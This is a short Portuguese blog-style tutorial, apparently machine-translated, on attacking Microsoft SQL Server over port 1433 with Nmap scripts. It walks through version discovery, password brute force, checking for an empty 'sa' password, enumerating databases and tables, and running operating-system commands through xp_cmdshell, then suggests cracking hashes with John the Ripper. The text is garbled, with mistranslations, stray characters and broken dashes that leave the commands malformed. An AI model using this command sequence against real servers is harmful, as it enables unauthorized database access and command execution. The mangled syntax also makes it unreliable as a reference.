Teste de caneta SQL com mecanismo de script Nmap e Nmap

O Nmap Scripting Engine nos permite usar o Nmap além de um scanner de portas e como um teste completo de penetração da plataforma.

Neste post, trataremos de algumas técnicas que podemos aplicar a uma rede para verificar nosso S.

Geralmente, os bancos de dados SQL sĂŁo reproduzidos do padrĂŁo para 1433.

Ao abrir o nmap, podemos dar o seguinte comando:

Νmap – p1433 – script ms-sql-info xxx.xxx.xxx.xxx (ip SQL Server), a combinação do Nmap e do Nmap Script Engine nos fornece informaçÔes imediatamente sobre a versĂŁo do SQL e o nome da instĂąncia.

nmap1

No mecanismo de script Nmap, hĂĄ o ms-sql-brute que verificarĂĄ as senhas.

nmap-2

O comando Ă© Nmap -p1433 – script ms-sql-brute xxx.xxx.xxx.xxx se nĂŁo encontrarmos nada, podemos usar alguma lista de senhas personalizadas, o comando serĂĄ se considerarmos que o arquivo com as senhas Ă© pass.txt .

nmap -p1433 –script ms-sql-brute –script-args userdb = / var / pass.txt, passdb = / var / pass.txt

Ao mesmo tempo, o mecanismo de script Nmap nos permite encontrar senhas nulas em infraestruturas com o Microsoft SQL Server.

O comando seria o seguinte

Nmap – p1433 – script ms-sql-empty-password xxx.xxx.xxx.xxx

Aqui, vemos que a conta sa nĂŁo possui uma senha; para descobrir em qual banco de dados temos acesso, usaremos o script ms-sql-hasdbaccess com os seguintes argumentos:

Nmap – p1433 – -script ms-sql-hasdbaccess.nse – -script-args mssql.username = sa xxx.xxx.xxx.xxx

Em seguida, encontraremos as tabelas dos bancos de dados com o seguinte comando.

Nmap –p1433 – -script ms-sql-tables –script-args msql.username = sa xxx.xxx.xxx.xxx

Nas versÔes anteriores do MSSQL (SQL 2000), o xp_cmdshell é ativado por padrão e podemos executar comandos dos comandos do sistema operacional por meio de scripts do Nmap, como.

Nmap –p1433 – -script ms-sql-xp-cmdshell – – script-args mssql.username = sa xxx.xxx.xxx.xxx

No Continuidade

Nmap -p1433 – -script ms-sql-xp-cmdshell – -script –args = ms-sql-xp-cmdshell.cmd = ‘usuĂĄrios da rede’, mssql.username = sa xxx.xxx.xxx.xxx

Também devemos dizer que podemos usar o mecanismo de script Nmap & Nmap com outras ferramentas, como John the Ripper. Com john the ripper, podemos extrair os hashes de senha do banco de dados para prosseguir com a quebra de senha.

Agradecemos calorosamente a seu membro SecTeam @johnzontos.